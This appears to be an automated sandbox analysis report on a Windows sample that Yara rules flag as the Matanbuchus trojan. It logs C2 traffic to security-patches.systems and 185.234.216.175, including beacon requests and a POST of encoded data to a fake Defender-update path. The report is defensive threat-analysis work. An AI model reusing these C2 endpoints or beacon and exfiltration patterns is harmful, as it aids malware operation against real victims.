Source: unknown	Network traffic detected: HTTP traffic on port 49753 -> 4443
Source: unknown	Network traffic detected: HTTP traffic on port 4443 -> 49753
Source: unknown	Network traffic detected: HTTP traffic on port 49754 -> 4443
Source: unknown	Network traffic detected: HTTP traffic on port 4443 -> 49754
Source: unknown	Network traffic detected: HTTP traffic on port 49755 -> 4443
Source: unknown	Network traffic detected: HTTP traffic on port 4443 -> 49755
Source: unknown	Network traffic detected: HTTP traffic on port 49757 -> 4443
Source: unknown	Network traffic detected: HTTP traffic on port 4443 -> 49757
Source: unknown	Network traffic detected: HTTP traffic on port 49758 -> 4443
Source: unknown	Network traffic detected: HTTP traffic on port 4443 -> 49758
Source: unknown	Network traffic detected: HTTP traffic on port 49765 -> 4443
Source: unknown	Network traffic detected: HTTP traffic on port 4443 -> 49765
Source: unknown	Network traffic detected: HTTP traffic on port 49771 -> 4443
Source: unknown	Network traffic detected: HTTP traffic on port 4443 -> 49771
Source: unknown	Network traffic detected: HTTP traffic on port 49772 -> 4443
Source: unknown	Network traffic detected: HTTP traffic on port 4443 -> 49772
Source: unknown	Network traffic detected: HTTP traffic on port 49779 -> 4443
Source: unknown	Network traffic detected: HTTP traffic on port 4443 -> 49779
Source: unknown	Network traffic detected: HTTP traffic on port 49785 -> 4443
Source: unknown	Network traffic detected: HTTP traffic on port 4443 -> 49785
Source: unknown	Network traffic detected: HTTP traffic on port 49790 -> 4443
Source: unknown	Network traffic detected: HTTP traffic on port 4443 -> 49790
Source: unknown	Network traffic detected: HTTP traffic on port 49796 -> 4443
Source: unknown	Network traffic detected: HTTP traffic on port 4443 -> 49796
Source: unknown	Network traffic detected: HTTP traffic on port 49798 -> 4443
Source: unknown	Network traffic detected: HTTP traffic on port 4443 -> 49798
Source: unknown	Network traffic detected: HTTP traffic on port 49804 -> 4443
Source: unknown	Network traffic detected: HTTP traffic on port 4443 -> 49804
Source: unknown	Network traffic detected: HTTP traffic on port 49810 -> 4443
Source: unknown	Network traffic detected: HTTP traffic on port 4443 -> 49810
Source: unknown	Network traffic detected: HTTP traffic on port 49815 -> 4443
Source: unknown	Network traffic detected: HTTP traffic on port 4443 -> 49815
Source: unknown	Network traffic detected: HTTP traffic on port 49817 -> 4443
Source: unknown	Network traffic detected: HTTP traffic on port 4443 -> 49817
Source: unknown	Network traffic detected: HTTP traffic on port 49823 -> 4443
Source: unknown	Network traffic detected: HTTP traffic on port 4443 -> 49823
Source: unknown	Network traffic detected: HTTP traffic on port 49828 -> 4443
Source: unknown	Network traffic detected: HTTP traffic on port 4443 -> 49828
Source: unknown	Network traffic detected: HTTP traffic on port 49833 -> 4443
Source: unknown	Network traffic detected: HTTP traffic on port 4443 -> 49833
Source: unknown	Network traffic detected: HTTP traffic on port 49838 -> 4443
Source: unknown	Network traffic detected: HTTP traffic on port 4443 -> 49838
Source: unknown	Network traffic detected: HTTP traffic on port 49840 -> 4443
Source: unknown	Network traffic detected: HTTP traffic on port 4443 -> 49840
Source: unknown	Network traffic detected: HTTP traffic on port 49846 -> 4443
Source: unknown	Network traffic detected: HTTP traffic on port 4443 -> 49846
Source: unknown	Network traffic detected: HTTP traffic on port 49852 -> 4443
Source: unknown	Network traffic detected: HTTP traffic on port 4443 -> 49852
Source: unknown	Network traffic detected: HTTP traffic on port 49857 -> 4443
Source: unknown	Network traffic detected: HTTP traffic on port 4443 -> 49857
Source: unknown	Network traffic detected: HTTP traffic on port 49863 -> 4443
Source: unknown	Network traffic detected: HTTP traffic on port 4443 -> 49863
Source: unknown	Network traffic detected: HTTP traffic on port 49866 -> 4443
Source: unknown	Network traffic detected: HTTP traffic on port 4443 -> 49866
Source: unknown	Network traffic detected: HTTP traffic on port 49871 -> 4443
Source: unknown	Network traffic detected: HTTP traffic on port 4443 -> 49871
Source: unknown	Network traffic detected: HTTP traffic on port 49877 -> 4443
Source: unknown	Network traffic detected: HTTP traffic on port 4443 -> 49877
Source: unknown	Network traffic detected: HTTP traffic on port 49881 -> 4443
Source: unknown	Network traffic detected: HTTP traffic on port 4443 -> 49881
Source: unknown	Network traffic detected: HTTP traffic on port 49885 -> 4443
Source: unknown	Network traffic detected: HTTP traffic on port 4443 -> 49885
Source: unknown	Network traffic detected: HTTP traffic on port 49890 -> 4443
Source: unknown	Network traffic detected: HTTP traffic on port 4443 -> 49890
Source: unknown	Network traffic detected: HTTP traffic on port 49895 -> 4443
Source: unknown	Network traffic detected: HTTP traffic on port 4443 -> 49895
Source: unknown	Network traffic detected: HTTP traffic on port 49901 -> 4443
Source: unknown	Network traffic detected: HTTP traffic on port 4443 -> 49901
Source: unknown	Network traffic detected: HTTP traffic on port 49907 -> 4443
Source: unknown	Network traffic detected: HTTP traffic on port 4443 -> 49907
Source: unknown	Network traffic detected: HTTP traffic on port 49910 -> 4443
Source: unknown	Network traffic detected: HTTP traffic on port 4443 -> 49910
Source: unknown	Network traffic detected: HTTP traffic on port 49915 -> 4443
Source: unknown	Network traffic detected: HTTP traffic on port 4443 -> 49915
Source: unknown	Network traffic detected: HTTP traffic on port 49920 -> 4443
Source: unknown	Network traffic detected: HTTP traffic on port 4443 -> 49920
Source: unknown	Network traffic detected: HTTP traffic on port 49926 -> 4443
Source: unknown	Network traffic detected: HTTP traffic on port 4443 -> 49926
Source: unknown	Network traffic detected: HTTP traffic on port 49931 -> 4443
Source: unknown	Network traffic detected: HTTP traffic on port 4443 -> 49931
Source: unknown	Network traffic detected: HTTP traffic on port 49935 -> 4443
Source: unknown	Network traffic detected: HTTP traffic on port 4443 -> 49935
Source: unknown	Network traffic detected: HTTP traffic on port 49940 -> 4443
Source: unknown	Network traffic detected: HTTP traffic on port 4443 -> 49940
Source: unknown	Network traffic detected: HTTP traffic on port 49946 -> 4443
Source: unknown	Network traffic detected: HTTP traffic on port 4443 -> 49946
Source: unknown	Network traffic detected: HTTP traffic on port 49952 -> 4443
Source: unknown	Network traffic detected: HTTP traffic on port 4443 -> 49952
Source: unknown	Network traffic detected: HTTP traffic on port 49957 -> 4443
Source: unknown	Network traffic detected: HTTP traffic on port 4443 -> 49957
Source: unknown	Network traffic detected: HTTP traffic on port 49960 -> 4443
Source: unknown	Network traffic detected: HTTP traffic on port 4443 -> 49960
Source: unknown	Network traffic detected: HTTP traffic on port 49965 -> 4443
Source: unknown	Network traffic detected: HTTP traffic on port 4443 -> 49965
Source: unknown	Network traffic detected: HTTP traffic on port 49971 -> 4443
Source: unknown	Network traffic detected: HTTP traffic on port 4443 -> 49971
Source: unknown	Network traffic detected: HTTP traffic on port 49976 -> 4443
Source: unknown	Network traffic detected: HTTP traffic on port 4443 -> 49976
Source: unknown	Network traffic detected: HTTP traffic on port 49979 -> 4443
Source: unknown	Network traffic detected: HTTP traffic on port 4443 -> 49979
Source: unknown	Network traffic detected: HTTP traffic on port 49984 -> 4443
Source: unknown	Network traffic detected: HTTP traffic on port 4443 -> 49984
Source: unknown	Network traffic detected: HTTP traffic on port 49987 -> 4443
Source: unknown	Network traffic detected: HTTP traffic on port 4443 -> 49987
Source: unknown	Network traffic detected: HTTP traffic on port 49992 -> 4443
Source: unknown	Network traffic detected: HTTP traffic on port 4443 -> 49992
Source: unknown	Network traffic detected: HTTP traffic on port 49997 -> 4443
Source: unknown	Network traffic detected: HTTP traffic on port 4443 -> 49997
Source: unknown	Network traffic detected: HTTP traffic on port 50000 -> 4443
Source: unknown	Network traffic detected: HTTP traffic on port 4443 -> 50000
Source: unknown	Network traffic detected: HTTP traffic on port 50003 -> 4443
Source: unknown	Network traffic detected: HTTP traffic on port 4443 -> 50003
Source: unknown	Network traffic detected: HTTP traffic on port 50009 -> 4443
Source: unknown	Network traffic detected: HTTP traffic on port 4443 -> 50009
Source: unknown	Network traffic detected: HTTP traffic on port 50015 -> 4443
Source: unknown	Network traffic detected: HTTP traffic on port 4443 -> 50015
Source: unknown	Network traffic detected: HTTP traffic on port 50020 -> 4443
Source: unknown	Network traffic detected: HTTP traffic on port 4443 -> 50020
Source: unknown	Network traffic detected: HTTP traffic on port 50024 -> 4443
Source: unknown	Network traffic detected: HTTP traffic on port 4443 -> 50024
Source: unknown	Network traffic detected: HTTP traffic on port 50028 -> 4443
Source: unknown	Network traffic detected: HTTP traffic on port 4443 -> 50028
Source: unknown	Network traffic detected: HTTP traffic on port 50034 -> 4443
Source: unknown	Network traffic detected: HTTP traffic on port 4443 -> 50034
Source: unknown	Network traffic detected: HTTP traffic on port 50040 -> 4443
Source: unknown	Network traffic detected: HTTP traffic on port 4443 -> 50040
Source: unknown	Network traffic detected: HTTP traffic on port 50045 -> 4443
Source: unknown	Network traffic detected: HTTP traffic on port 4443 -> 50045
Source: unknown	Network traffic detected: HTTP traffic on port 50048 -> 4443
Source: unknown	Network traffic detected: HTTP traffic on port 4443 -> 50048
Source: unknown	Network traffic detected: HTTP traffic on port 50053 -> 4443
Source: unknown	Network traffic detected: HTTP traffic on port 4443 -> 50053
Source: unknown	Network traffic detected: HTTP traffic on port 50059 -> 4443
Source: unknown	Network traffic detected: HTTP traffic on port 4443 -> 50059
Source: unknown	Network traffic detected: HTTP traffic on port 50065 -> 4443
Source: unknown	Network traffic detected: HTTP traffic on port 4443 -> 50065
Source: unknown	Network traffic detected: HTTP traffic on port 50070 -> 4443
Source: unknown	Network traffic detected: HTTP traffic on port 4443 -> 50070
Source: unknown	Network traffic detected: HTTP traffic on port 50073 -> 4443
Source: unknown	Network traffic detected: HTTP traffic on port 4443 -> 50073
Source: unknown	Network traffic detected: HTTP traffic on port 50078 -> 4443
Source: unknown	Network traffic detected: HTTP traffic on port 4443 -> 50078
Source: unknown	Network traffic detected: HTTP traffic on port 50084 -> 4443
Source: unknown	Network traffic detected: HTTP traffic on port 4443 -> 50084
Source: unknown	Network traffic detected: HTTP traffic on port 50089 -> 4443
Source: unknown	Network traffic detected: HTTP traffic on port 4443 -> 50089
Source: unknown	Network traffic detected: HTTP traffic on port 50094 -> 4443
Source: unknown	Network traffic detected: HTTP traffic on port 4443 -> 50094
Source: unknown	Network traffic detected: HTTP traffic on port 50095 -> 4443
Source: unknown	Network traffic detected: HTTP traffic on port 4443 -> 50095
Source: unknown	Network traffic detected: HTTP traffic on port 50096 -> 4443
Source: unknown	Network traffic detected: HTTP traffic on port 4443 -> 50096
Source: unknown	Network traffic detected: HTTP traffic on port 50097 -> 4443
Source: unknown	Network traffic detected: HTTP traffic on port 4443 -> 50097
Source: unknown	Network traffic detected: HTTP traffic on port 50099 -> 4443
Source: unknown	Network traffic detected: HTTP traffic on port 4443 -> 50099
Source: unknown	Network traffic detected: HTTP traffic on port 50100 -> 4443
Source: unknown	Network traffic detected: HTTP traffic on port 4443 -> 50100
Source: unknown	Network traffic detected: HTTP traffic on port 50101 -> 4443
Source: unknown	Network traffic detected: HTTP traffic on port 4443 -> 50101
Source: unknown	Network traffic detected: HTTP traffic on port 50102 -> 4443
Source: unknown	Network traffic detected: HTTP traffic on port 4443 -> 50102
Source: unknown	Network traffic detected: HTTP traffic on port 50103 -> 4443
Source: unknown	Network traffic detected: HTTP traffic on port 4443 -> 50103
Source: unknown	Network traffic detected: HTTP traffic on port 50104 -> 4443
Source: unknown	Network traffic detected: HTTP traffic on port 4443 -> 50104
Source: unknown	Network traffic detected: HTTP traffic on port 50105 -> 4443
Source: unknown	Network traffic detected: HTTP traffic on port 4443 -> 50105
Source: unknown	Network traffic detected: HTTP traffic on port 50106 -> 4443
Source: unknown	Network traffic detected: HTTP traffic on port 4443 -> 50106
Source: unknown	Network traffic detected: HTTP traffic on port 50107 -> 4443
Source: unknown	Network traffic detected: HTTP traffic on port 4443 -> 50107
Source: unknown	Network traffic detected: HTTP traffic on port 50108 -> 4443
Source: unknown	Network traffic detected: HTTP traffic on port 4443 -> 50108
Source: unknown	Network traffic detected: HTTP traffic on port 50109 -> 4443
Source: unknown	Network traffic detected: HTTP traffic on port 4443 -> 50109
Source: unknown	Network traffic detected: HTTP traffic on port 50110 -> 4443
Source: unknown	Network traffic detected: HTTP traffic on port 4443 -> 50110
Source: unknown	Network traffic detected: HTTP traffic on port 50111 -> 4443
Source: unknown	Network traffic detected: HTTP traffic on port 4443 -> 50111
Source: unknown	Network traffic detected: HTTP traffic on port 50112 -> 4443
Source: unknown	Network traffic detected: HTTP traffic on port 4443 -> 50112
Source: unknown	Network traffic detected: HTTP traffic on port 50113 -> 4443
Source: unknown	Network traffic detected: HTTP traffic on port 4443 -> 50113
Source: unknown	Network traffic detected: HTTP traffic on port 50114 -> 4443
Source: unknown	Network traffic detected: HTTP traffic on port 4443 -> 50114
Source: unknown	Network traffic detected: HTTP traffic on port 50115 -> 4443
Source: unknown	Network traffic detected: HTTP traffic on port 4443 -> 50115
Source: unknown	Network traffic detected: HTTP traffic on port 50116 -> 4443
Source: unknown	Network traffic detected: HTTP traffic on port 4443 -> 50116
Source: unknown	Network traffic detected: HTTP traffic on port 50117 -> 4443
Source: unknown	Network traffic detected: HTTP traffic on port 4443 -> 50117
Source: unknown	Network traffic detected: HTTP traffic on port 50118 -> 4443
Source: unknown	Network traffic detected: HTTP traffic on port 4443 -> 50118
Source: unknown	Network traffic detected: HTTP traffic on port 50119 -> 4443
Source: unknown	Network traffic detected: HTTP traffic on port 4443 -> 50119
Source: unknown	Network traffic detected: HTTP traffic on port 50120 -> 4443
Source: unknown	Network traffic detected: HTTP traffic on port 4443 -> 50120
Source: unknown	Network traffic detected: HTTP traffic on port 50121 -> 4443
Source: unknown	Network traffic detected: HTTP traffic on port 4443 -> 50121
Source: unknown	Network traffic detected: HTTP traffic on port 50122 -> 4443
Source: unknown	Network traffic detected: HTTP traffic on port 4443 -> 50122
Source: unknown	Network traffic detected: HTTP traffic on port 50123 -> 4443
Source: unknown	Network traffic detected: HTTP traffic on port 4443 -> 50123
Source: unknown	Network traffic detected: HTTP traffic on port 50124 -> 4443
Source: unknown	Network traffic detected: HTTP traffic on port 4443 -> 50124
Source: unknown	Network traffic detected: HTTP traffic on port 50125 -> 4443
Source: unknown	Network traffic detected: HTTP traffic on port 4443 -> 50125
Source: unknown	Network traffic detected: HTTP traffic on port 50126 -> 4443
Source: unknown	Network traffic detected: HTTP traffic on port 4443 -> 50126
Source: unknown	Network traffic detected: HTTP traffic on port 50127 -> 4443
Source: unknown	Network traffic detected: HTTP traffic on port 4443 -> 50127
Source: unknown	Network traffic detected: HTTP traffic on port 50128 -> 4443
Source: unknown	Network traffic detected: HTTP traffic on port 4443 -> 50128
Source: unknown	Network traffic detected: HTTP traffic on port 50129 -> 4443
Source: unknown	Network traffic detected: HTTP traffic on port 4443 -> 50129
Source: unknown	Network traffic detected: HTTP traffic on port 50130 -> 4443
Source: unknown	Network traffic detected: HTTP traffic on port 4443 -> 50130
Source: unknown	Network traffic detected: HTTP traffic on port 50131 -> 4443
Source: unknown	Network traffic detected: HTTP traffic on port 4443 -> 50131
Source: unknown	Network traffic detected: HTTP traffic on port 50132 -> 4443
Source: unknown	Network traffic detected: HTTP traffic on port 4443 -> 50132
Source: unknown	Network traffic detected: HTTP traffic on port 50134 -> 4443
Source: unknown	Network traffic detected: HTTP traffic on port 4443 -> 50134

Source: global traffic

TCP traffic: 192.168.2.4:49738 -> 185.234.216.175:4443

Source: Joe Sandbox View

ASN Name: SPRINT-SDCPL SPRINT-SDCPL

Source: Joe Sandbox View

JA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19

Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1

Source: C:\Windows\SysWOW64\rundll32.exe

Code function: 4_2_7EE54390 socket,gethostbyname,connect,send,recv,std::ios_base::_Ios_base_dtor,

4_2_7EE54390

Source: global traffic	HTTP traffic detected: GET /AdminAccounts.aspx HTTP/1.1User-Agent: Microsoft-WNS/11.0Host: security-patches.systemsCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /verif.aspx HTTP/1.1User-Agent: Microsoft-WNS/11.0Host: security-patches.systemsCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /verif.aspx HTTP/1.1User-Agent: Microsoft-WNS/11.0Host: security-patches.systemsCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /verif.aspx HTTP/1.1User-Agent: Microsoft-WNS/11.0Host: security-patches.systemsCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /verif.aspx HTTP/1.1User-Agent: Microsoft-WNS/11.0Host: security-patches.systemsCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /verif.aspx HTTP/1.1User-Agent: Microsoft-WNS/11.0Host: security-patches.systemsCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /verif.aspx HTTP/1.1User-Agent: Microsoft-WNS/11.0Host: security-patches.systemsCache-Control: no-cache

Source: global traffic

DNS traffic detected: DNS query: security-patches.systems

Source: unknown

HTTP traffic detected: POST /WinDefUpdates/DefenderUpdates/index.php HTTP/1.1User-Agent: Microsoft-WNS/10.0Host: security-patches.systemsContent-Length: 525Content-Type: application/x-www-form-urlencodedAccept-Language: fr-CAData Raw: 64 61 74 61 3d 65 79 4a 42 62 6c 64 47 61 43 49 36 49 6e 4e 30 56 33 45 31 4b 32 78 43 52 6e 67 7a 5a 6d 70 42 50 54 30 69 4c 43 4a 47 63 33 52 4d 49 6a 6f 69 63 54 68 79 54 6a 64 77 54 58 42 43 62 6b 74 70 61 57 67 30 52 58 5a 57 61 6c 4d 78 55 6b 55 39 49 69 77 69 53 47 52 57 55 58 42 42 49 6a 6f 69 63 69 38 72 52 6a 5a 6a 51 6a 4a 4d 56 6c 68 71 49 69 77 69 55 55 5a 61 65 57 6c 70 56 56 68 5a 49 6a 6f 69 4d 6d 4a 75 55 6d 31 61 4f 44 67 69 4c 43 4a 53 59 6d 39 30 49 6a 6f 69 64 57 4e 68 65 54 51 72 51 6c 64 44 4d 6c 68 6d 49 69 77 69 55 32 4a 61 56 32 35 59 49 6a 6f 69 4d 7a 64 71 55 6d 31 61 56 58 63 69 4c 43 4a 5a 61 30 70 58 49 6a 70 62 49 6e 52 50 61 55 77 69 58 53 77 69 59 32 5a 4c 57 43 49 36 49 6a 4a 6e 50 54 30 69 4c 43 4a 6f 54 6d 39 32 53 6d 30 69 4f 69 4a 77 4b 32 56 56 65 6d 4e 7a 63 30 5a 6f 62 58 5a 71 52 45 4a 69 4e 6c 56 58 63 6d 39 42 50 54 30 69 4c 43 4a 76 51 6e 56 4e 56 58 55 69 4f 69 4a 6f 54 32 46 50 65 6d 52 52 50 53 49 73 49 6e 4e 30 64 56 6b 69 4f 69 49 78 63 6d 70 61 62 56 45 39 50 53 49 73 49 6e 5a 76 53 6d 4d 69 4f 69 4a 74 54 32 46 78 65 58 63 39 50 53 49 73 49 6e 64 42 59 30 67 69 4f 69 4a 78 54 30 4e 50 65 57 4e 7a 4d 32 46 6e 50 54 30 69 4c 43 4a 33 55 57 56 53 53 43 49 36 49 6a 4a 4d 4d 30 45 32 63 7a 56 33 49 69 77 69 65 47 56 44 59 32 70 54 49 6a 6f 69 63 69 73 79 54 6e 64 6a 61 7a 30 69 4c 43 4a 35 61 57 6c 56 57 46 6b 69 4f 69 4a 79 59 6b 38 34 4c 7a 67 31 63 55 6c 47 4c 7a 52 32 51 55 34 32 4f 56 49 32 62 32 39 75 4e 56 52 72 64 32 77 33 5a 47 4a 76 61 6e 68 6f 55 58 64 54 56 6d 64 59 52 57 64 4a 50 53 4a 39 Data Ascii: data=eyJBbldGaCI6InN0V3E1K2xCRngzZmpBPT0iLCJGc3RMIjoicThyTjdwTXBCbktpaWg0RXZWalMxUkU9IiwiSGRWUXBBIjoici8rRjZjQjJMVlhqIiwiUUZaeWlpVVhZIjoiMmJuUm1aODgiLCJSYm90IjoidWNheTQrQldDMlhmIiwiU2JaV25YIjoiMzdqUm1aVXciLCJZa0pXIjpbInRPaUwiXSwiY2ZLWCI6IjJnPT0iLCJoTm92Sm0iOiJwK2VVemNzc0ZobXZqREJiNlVXcm9BPT0iLCJvQnVNVXUiOiJoT2FPemRRPSIsInN0dVkiOiIxcmpabVE9PSIsInZvSmMiOiJtT2FxeXc9PSIsIndBY0giOiJxT0NPeWNzM2FnPT0iLCJ3UWVSSCI6IjJMM0E2czV3IiwieGVDY2pTIjoicisyTndjaz0iLCJ5aWlVWFkiOiJyYk84Lzg1cUlGLzR2QU42OVI2b29uNVRrd2w3ZGJvanhoUXdTVmdYRWdJPSJ9

Source: regsvr32.exe	String found in binary or memory: http://schemas.xml
Source: rundll32.exe, 00000004.00000002.4166785413.0000000002D5A000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000003.1784588520.0000000002DF7000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://security-patches.systems/
Source: rundll32.exe, 00000004.00000003.1784588520.0000000002DF7000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://security-patches.systems/.
Source: rundll32.exe, 00000004.00000003.1784679532.0000000002DB9000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://security-patches.systems/32
Source: rundll32.exe, 00000004.00000002.4166785413.0000000002D5A000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000002.4166785413.0000000002DA3000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://security-patches.systems/AdminAccounts.aspx
Source: rundll32.exe, 00000004.00000002.4166785413.0000000002DA3000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://security-patches.systems/AdminAccounts.aspx1Q
Source: rundll32.exe, 00000004.00000003.1784588520.0000000002DF7000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://security-patches.systems/c
Source: rundll32.exe, 00000004.00000003.1784588520.0000000002DF7000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://security-patches.systems/verif.aspx
Source: rundll32.exe, 00000004.00000003.1784588520.0000000002DF7000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://security-patches.systems/verif.aspx0
Source: rundll32.exe, 00000004.00000003.1784588520.0000000002DF7000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://security-patches.systems/verif.aspxF1yY
Source: rundll32.exe, 00000004.00000002.4167015419.0000000004717000.00000004.00000010.00020000.00000000.sdmp	String found in binary or memory: https://security-patches.systems/verif.aspxhttps://security-patches.systems/verif.aspxhttps://securi
Source: rundll32.exe, 00000004.00000003.1784588520.0000000002DF7000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://security-patches.systems/verif.aspxt1

Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49732
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49731
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49730
Source: unknown	Network traffic detected: HTTP traffic on port 49731 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49732 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49730 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49945 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50098
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50133
Source: unknown	Network traffic detected: HTTP traffic on port 50098 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50133 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49778 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49945
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49778

Source: unknown	HTTPS traffic detected: 185.234.216.175:443 -> 192.168.2.4:49730 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 185.234.216.175:443 -> 192.168.2.4:49732 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 185.234.216.175:443 -> 192.168.2.4:49778 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 185.234.216.175:443 -> 192.168.2.4:49945 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 185.234.216.175:443 -> 192.168.2.4:50098 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 185.234.216.175:443 -> 192.168.2.4:50133 version: TLS 1.2

System Summary

Malicious sample detected (through community Yara rule)

Source: 14.2.regsvr32.exe.7f150000.1.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Matanbuchus_4ce9affb Author: unknown
Source: 14.2.regsvr32.exe.7f150000.1.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Matanbuchus_58a61aaa Author: unknown
Source: 16.2.regsvr32.exe.7f3b0000.1.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Matanbuchus_4ce9affb Author: unknown
Source: 16.2.regsvr32.exe.7f3b0000.1.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Matanbuchus_58a61aaa Author: unknown
Source: 11.2.regsvr32.exe.7f4b0000.1.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Matanbuchus_4ce9affb Author: unknown
Source: 11.2.regsvr32.exe.7f4b0000.1.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Matanbuchus_58a61aaa Author: unknown
Source: 11.2.regsvr32.exe.7f4b0000.1.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Matanbuchus_4ce9affb Author: unknown
Source: 11.2.regsvr32.exe.7f4b0000.1.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Matanbuchus_58a61aaa Author: unknown
Source: 6.2.regsvr32.exe.7eed0000.1.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Matanbuchus_4ce9affb Author: unknown
Source: 6.2.regsvr32.exe.7eed0000.1.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Matanbuchus_58a61aaa Author: unknown
Source: 4.2.rundll32.exe.7ee00000.2.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Matanbuchus_4ce9affb Author: unknown
Source: 4.2.rundll32.exe.7ee00000.2.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Matanbuchus_58a61aaa Author: unknown
Source: 14.2.regsvr32.exe.7f150000.1.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Matanbuchus_4ce9affb Author: unknown
Source: 14.2.regsvr32.exe.7f150000.1.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Matanbuchus_58a61aaa Author: unknown
Source: 6.2.regsvr32.exe.7eed0000.1.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Matanbuchus_4ce9affb Author: unknown
Source: 6.2.regsvr32.exe.7eed0000.1.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Matanbuchus_58a61aaa Author: unknown
Source: 16.2.regsvr32.exe.7f3b0000.1.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Matanbuchus_4ce9affb Author: unknown
Source: 16.2.regsvr32.exe.7f3b0000.1.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Matanbuchus_58a61aaa Author: unknown
Source: 4.2.rundll32.exe.7ee00000.2.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Matanbuchus_4ce9affb Author: unknown
Source: 4.2.rundll32.exe.7ee00000.2.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Matanbuchus_58a61aaa Author: unknown
Source: 00000010.00000002.3747374058.0000000004D91000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Matanbuchus_4ce9affb Author: unknown
Source: 00000010.00000002.3747374058.0000000004D91000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Matanbuchus_58a61aaa Author: unknown
Source: 00000010.00000002.3747924404.000000007F3B0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Matanbuchus_4ce9affb Author: unknown
Source: 00000010.00000002.3747924404.000000007F3B0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Matanbuchus_58a61aaa Author: unknown
Source: 00000004.00000002.4167564945.0000000005395000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Matanbuchus_4ce9affb Author: unknown
Source: 00000004.00000002.4167564945.0000000005395000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Matanbuchus_58a61aaa Author: unknown
Source: 00000006.00000002.2050560714.000000007EED0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Matanbuchus_4ce9affb Author: unknown
Source: 00000006.00000002.2050560714.000000007EED0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Matanbuchus_58a61aaa Author: unknown
Source: 0000000E.00000002.3141366328.000000007F150000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Matanbuchus_4ce9affb Author: unknown
Source: 0000000E.00000002.3141366328.000000007F150000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Matanbuchus_58a61aaa Author: unknown
Source: 0000000B.00000002.2555091731.0000000004A29000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Matanbuchus_4ce9affb Author: unknown
Source: 0000000B.00000002.2555091731.0000000004A29000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Matanbuchus_58a61aaa Author: unknown
Source: 00000006.00000002.2050235093.0000000004D82000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Matanbuchus_4ce9affb Author: unknown
Source: 00000006.00000002.2050235093.0000000004D82000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Matanbuchus_58a61aaa Author: unknown
